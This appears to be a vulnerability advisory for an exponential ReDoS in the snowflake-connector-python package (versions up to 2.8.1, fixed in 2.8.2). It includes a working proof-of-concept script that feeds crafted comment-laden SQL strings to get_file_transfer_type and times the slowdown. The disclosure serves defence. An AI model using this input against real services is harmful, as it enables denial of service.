Exponential ReDoS in snowflake-connector-python leads to denial of service
snowflake-connector-python (,2.8.1], Fixed in 2.8.2
An exponential ReDoS (Regular Expression Denial of Service) can be triggered in the snowflake-connector-python PyPI package, when an attacker is able to supply arbitrary input to the undocumented get_file_transfer_type method.
import time
from snowflake.connector.cursor import SnowflakeCursor
for i in range(100):
start_time = time.time()
sql = '/**/\n' + '\t/*/get\t*/\t/**/\n'*i + '\t*/get\n'
SnowflakeCursor.get_file_transfer_type(sql)
print("--- %s seconds ---" % (time.time() - start_time))
No mitigations are supplied for this issue